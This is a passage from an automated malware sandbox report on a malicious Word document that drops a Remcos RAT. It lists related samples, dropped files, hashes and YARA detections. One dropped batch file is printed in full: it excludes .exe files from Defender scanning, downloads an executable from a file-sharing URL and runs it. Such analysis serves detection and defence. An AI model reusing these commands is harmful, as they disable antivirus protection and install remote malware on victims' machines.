	Valyria.6367.vbs	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	Engine Spares PN#_Desc_&_Qty Details.vbs	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	Report.vbs	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	22041081517_20220329_16042903_HesapOzeti.pdf.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	PARKING LIST.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	Sydncvm.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	ORDER .exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	PO_287104.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	GM66809-SUPPLY OF VALVE, ORIFICE PLATE AND PRESSURE RELIEF VALVE.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	Qty Details.vbs	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	YUYTRYTHFFH.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	Order.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	INVOICE.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe (copy)	12543_0008858249_FWDOUTSTANDING_20200604.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\fd1981f4a71244758e929e11db0d4f1d$dpx$.tmp\bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp	12543_0008858249_FWDOUTSTANDING_20200604.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Config.Msi\54841c.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	8063
Entropy (8bit):	5.625948505702219
Encrypted:	false
SSDEEP:	96:v9uACuuAIwneyhESsU7eD2XveCsvRqTU7eD2XveC6jzT9XuA5vRqnHmuAl/5+ZNA:v9uYuweI3vdq3vdeumuKIZuJ6pI
MD5:	149B8F4389796AC425C6DCC6B8FA2337
SHA1:	9222AA785E8BDE91B7DD2D077CB35A0395C54E5E
SHA-256:	F742177C583D3E543EA5E89955D8D516D6696E8AC5D2D51DEDEAB1B23551DF54
SHA-512:	80B9059625AF5A4F0D5CBDF5BF05444C2C9226E74C9A544D0A6455E886EBEF56ECAC702417F6EE913FDEC132362596ACB234C45121F1A9EA8C7780ECE4BED1C7
Malicious:	false
Preview:	...@IXOS.@.....@.K.T.@.....@.....@.....@.....@.....@......&.{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}P.Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..TRY.msi.@.....@.G...@.....@......ProductIcon..&.{4982A61C-946D-4168-809C-13FF99C4C351}.....@.....@.....@.....@.......@.....@.....@.......@....P.Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}&.{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....*.SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\...@....(.&...LogonUser..user'.&...USERNAME..pratesh'.&...Date..4/20/2022'.&...Time..9:29:17'.&...WRAPPED_ARGUMENTS....RegisterProduct..Registering product..[1]......C:\Windows\Installer\54841d.msi......C:\Windows\Inst

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\931CA4E3-9003-4E2D-AC60-8F56ED9BC214

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	144710
Entropy (8bit):	5.3569214769936435
Encrypted:	false
SSDEEP:	1536:+cQIfgxgBdB3guw0/Q9DQW+zzWk4F77nXmvidZXHETLWZ69:YIQ9DQW+zyXkf
MD5:	AE03C71171234246FD0F4CA50039F028
SHA1:	AF9B8FFB934FCE17096A93EF0D413905370F6A8E
SHA-256:	B2817D0D5F3029079273D4B6F49F7BCC506FAE3AD367537AFC95F7BD3BF0EBAE
SHA-512:	A322093A3F955DB77D5F2621B2B78116F4AE09CB561D43A7956137ADF82AB3C40A1376B032AD61678E84B5B4660C8F3239BCD70FF49700883B01040CC5680021
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-04-20T07:28:10">.. Build: 16.0.15210.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1A0CB39D-07E3-4E62-8803-0A309F2608CA}.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1108
Entropy (8bit):	5.269572569370992
Encrypted:	false
SSDEEP:	24:3XoPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKEbC:noPerB4nqRL/HvFe9t4Cv94zO
MD5:	5BA537743CCA330A1B68B49980D62AD3
SHA1:	7E7D39CA96A3298A5AD5FE29E85C3E6119CF4468
SHA-256:	BDE999834ED1E67AEAD208FD587E51E54DF418232A9D203350B43AF1DAB5736D
SHA-512:	253899EC94019C58F9E97D37B7D08D2312BC65DDF9D44FCAB76CC1C11126B75A59E15DB1E1AD7C8B92540574E5BE19359AB2739479BB7B2E663AF97D4F3568B7
Malicious:	false
Preview:	@...e...................................^............@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	473600
Entropy (8bit):	6.585152722494749
Encrypted:	false
SSDEEP:	12288:9oCqKde3G314caiojGRoaOd+2sfZsZVg:eAdIG314cFo4Od+NZUS
MD5:	97B73CA76EC68B6580151220097A1292
SHA1:	099019FF87F25E274D699914E59E4E1582B9E51A
SHA-256:	85E089579FA0826C0FDC9B340B93E006BE1F3A5D78EBAC0A8F48C0D3A3FDFED3
SHA-512:	DACE411A39F51697F3D59C79C1C39B57598CF5F4E01223F8F4AEBDEF661A88F347F1ED251C6DFE02A0E50AD16BABC301AA88A1334678CABF1D7B1DFC0A3BCD7F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, Author: ditekSHen Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;.ALZ..LZ..LZ......_Z.......Z......RZ..E"x.MZ....;.NZ..w...VZ..w...vZ..w...nZ..E"o.YZ..LZ..e[.......Z......MZ......MZ..RichLZ..........................PE..L.....Fb.................,..........U........@....@....................................................................................HK...................`..\|8...{..8...................4\|.......{..@............@...............................text....*.......,.................. ..`.rdata...o...@...p...0..............@..@.data....>..........................@....tls................................@....gfids..0...........................@..@.rsrc...HK.......L..................@..@.reloc..\|8...`...:..................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\thai.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	192
Entropy (8bit):	5.038473612824116
Encrypted:	false
SSDEEP:	3:mKDDGKSSJJFIGtxVfHeGAFddGeWLERy44ASVOGSJJFIGtATH3x85MHVWfILGYgPe:hSG8G3V/eGgdEWRy44ASQ98GSLh8uWfi
MD5:	0187F7CF14FF509BAFFEEDC6909AEF04
SHA1:	01689D0CD0070F66D2FA1465E79C43641A52574D
SHA-256:	C63EB9290E361D2474C8C8EA29869CA413005CC033146B54E30C3363C5B81170
SHA-512:	63C8B8F1214172258D137FBD166912A17053A032CCFBE188E71369A10D4D8F5F8CF97A109BC7E0C8DE19EADF7A29855A224C2092887191F8F38974012BB66F2F
Malicious:	false
Preview:	@echo off..powershell -command "Set-MpPreference -ExclusionExtension ".exe"..powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"..start TRY.exe

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files.cab

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Microsoft Cabinet archive data, 155244 bytes, 1 file
Category:	dropped
Size (bytes):	155244
Entropy (8bit):	6.820072420859643
Encrypted:	false
SSDEEP:	3072:avGygixtiq1P5GWp/icKAArDZz4/9GhbkrNEO1Yq:eUEpKy/90QEc
MD5:	2A683F9BE589B6F5581EA6298C95AFBC
SHA1:	B78112E20E2E465B58D803BF93ED458FE8492161
SHA-256:	8A64B66F67D4C199154659B5BB448173B46C1ADB1B2F9AE24CEFF17C858B96D5
SHA-512:	731B78A6DAABD45E375681F6CE60FD42A429C655EE93784B4599DDE78936DB307370A96D64F6B289DBDBA033F18B192F6DD47720E4976F6ABF5B49B3490348D9
Malicious:	false
Preview:	MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B............................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe (copy)

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	155136
Entropy (8bit):	6.821026780783546
Encrypted:	false
SSDEEP:	3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
MD5:	96DF7B0C491646EFC2E5F2E9F0443B8B
SHA1:	560F0295ABE71FEFFF38912C1121B27E40237FE5
SHA-256:	4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
SHA-512:	E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
Malicious:	false
Joe Sandbox View:	Filename: 12543_0008858249_FWDOUTSTANDING_20200604.doc, Detection: malicious, Browse Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\fd1981f4a71244758e929e11db0d4f1d$dpx$.tmp\bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	155136
Entropy (8bit):	6.821026780783546
Encrypted:	false
SSDEEP:	3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
MD5:	96DF7B0C491646EFC2E5F2E9F0443B8B
SHA1:	560F0295ABE71FEFFF38912C1121B27E40237FE5
SHA-256:	4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
SHA-512:	E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
Malicious:	false
Joe Sandbox View:	Filename: 12543_0008858249_FWDOUTSTANDING_20200604.doc, Detection: malicious, Browse Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\msiwrapper.ini

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	3.6454535499125003
Encrypted:	false
SSDEEP:	24:f3dX8DW8dfja/0vZ4MBlolESIFhfP7CVfP7C1MymfP7C1mDvnYl:fe7Z4MB6lmFh3i3rb3pvYl
MD5:	E89D29F59671328DF52CD9C795111FF7
SHA1:	EAD8C54DBD81BE5286ACA13B4427B83784008050
SHA-256:	49242F94278925A0374D7BD236BD453B72E249AE1DCD2DF537F663DC37A4C283
SHA-512:	F16E6FA514683C77278F2E33DE132A36B3B0813F761E86101D597E2376C6561194D4BBAF8D4E1AA95D443BF35C9AB52A3EB89BA5D38E4B2221BCEE6F7ED9874D
Malicious:	false
Preview:	W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.a.d.m.i.n.i.s.t.r.a.t.o.r.s...B.a.s.e.N.a.m.e.=.T.R.Y...e.x.e...C.a.b.H.a.s.h.=.8.a.6.4.b.6.6.f.6.7.d.4.c.1.9.9.1.5.4.6.5.9.b.5.b.b.4.4.8.1.7.3.b.4.6.c.1.a.d.b.1.b.2.f.9.a.e.2.4.c.e.f.f.1.7.c.8.5.8.b.9.6.d.5...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=..S.O.U.R.C.E.D.I.R....U.I.L.e.v.e.l.=.2...F.o.c.u.s.=.n.o...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.8.3.d.1.b.0.f.2.-.4.b.8.1.-.4.e.9.a.-.9.d.2.c.-.0.9.9.4.3.d.4.6.e.d.b.9.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.8.3.d.1.b.0.f.2.-.4.b.8.1.-.4.e.9.a.-.9.d.2.c.-.0.9.9.4.3.d.4.6.e.d.b.9.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.r.a.m.e.t.e.r.s.=...R.u.n.A.f.t.e.r.I.n.s.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au1v2jy0.qdl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dk05raat.4wt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myufjp0m.iol.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgd2gy31.vwg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	4.346592041672427
Encrypted:	false
SSDEEP:	192:6QhaSsXlT0ieIDzK2JK03serJw5KXlHcHAQbbMlV4kE0jBauthy/7tZ5HMa9V:zwXh0GE03Xw5qEr24kE0jB1t4/Zn
MD5:	6D9A234FFCA25681F637B82DD7494BA1
SHA1:	0A6518C6E6D3D0C200AEF120C368BA498C79D587
SHA-256:	1B4710044BF69C011FBBD8C8C9A100AD23BE4647B958D9087280459541E585E9
SHA-512:	9FA4198DCF79633F659DB551523CBAEE79F90BFF795AD5C6F4B71E9614FC9EEA836AF680D630399EC929F43BCE89C4EEA07C5836588A3B638A88E8A82A471668
Malicious:	true
Yara Hits:	Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP, Author: Nils Kuhnert Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP, Author: Florian Roth
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$...........................................................................................(....................... ...!..."...#...%.......&...'...)...........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFA309B2BDC50B89D5.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\12543_0008858249_FWDOUTSTANDING_20200604.LNK

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:28:54 2022, mtime=Wed Apr 20 15:28:12 2022, atime=Wed Apr 20 15:28:06 2022, length=62976, window=hide
Category:	dropped
Size (bytes):	1210
Entropy (8bit):	4.685107933836166
Encrypted:	false
SSDEEP:	24:8/Apz8Kp0ezsJ+WADKxvvBXD+5DyA7aB6m:8IeKtNDKxQ+B6
MD5:	6D27BD9EC4B7DA1FEE601E1CC8C0AF08
SHA1:	EEE09ED46081F61B6841BCA0E6255D0132781F8E
SHA-256:	C244D8CC7C3DFC9010579137835C1A68DED5B25D5F357508F6A608640294CE02
SHA-512:	1F5E2C1D04B27478B5882EC8BF23A68042BC70CD4E8C5C06188F5C0BB5AD0EA89276F6A3CD9F33CA6219EA5C51C1F148451A4315C5C7FE5BAB989573364288E0
Malicious:	false
Preview:	L..................F.... ....<K..3..\|m...T....v..T...............................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...T{.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....hT....user..>.......NM..T{......S........................a.l.f.o.n.s.....~.1.....hT....Desktop.h.......NM..T{......Y..............>.....7...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......T.. .12543_~1.DOC.........hT...T............................{D..1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.......s...............-.......r...........>.S......C:\Users\user\Desktop\12543_0008858249_FWDOUTSTANDING_20200604.doc..C.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.........:..,.LB.)...Aw...`.......X.......377142...........!a..%.H.VZAj...w..s.........W...!a..%.H.VZAj...w..s.........W......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	131
Entropy (8bit):	4.970285316783502
Encrypted:	false
SSDEEP:	3:bDuMJlBPddqc6Kw7XVLR6YVomX1UXWddqc6Kw7XVLR6YVov:bCUPddqc6N7Xy4cXWddqc6N7Xy4y
MD5:	AC465E397B58BF09906407F06803641B
SHA1:	91C663F69C167B45184DB10BE2368073F56B7DD6
SHA-256:	9F3CFAB15CF36A28AFD1552EEEF61449EBD28BEC40F42BA88E2FD86859F3D023
SHA-512:	C0BCF40F37E7FAAB60C4822663B95F232003CDF8B701444B741AFB5271410C1FFBC9F76E1D8879470D6A35E557C5C2D370513E993CF7CB626A9750A31B03F65C
Malicious:	false
Preview:	[folders]..Templates.LNK=0..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..[doc]..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5450867843084586
Encrypted:	false
SSDEEP:	3:Rl/Zdw9+ll1lqKxzJ3vhl0KSWlL5rHon:RtZWolgqzJ3j5rHon
MD5:	90FE4A5D031376AC03425B330C52828E
SHA1:	26B8D13BD32B50FF95857B8C4B942F7B63431D44
SHA-256:	2062177A481969B8B5852AE622E628D75DC57D50E0880E566389D4B19459E87C
SHA-512:	FC34DEE711434504B8A8BDF3BCA49B62854F07B12D9A04BECD63CA496B6C41E03B5350816EE4653CAA05358D6CCE64D1BA62EC04E2E9DCFA0659EFA348E12563
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h...}......o...5..........T.......6C.......o...6...........................o...7....sl@_......

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Category:	dropped
Size (bytes):	20
Entropy (8bit):	2.8954618442383215
Encrypted:	false
SSDEEP:	3:QVNliGn:Q9rn
MD5:	C4F79900719F08A6F11287E3C7991493
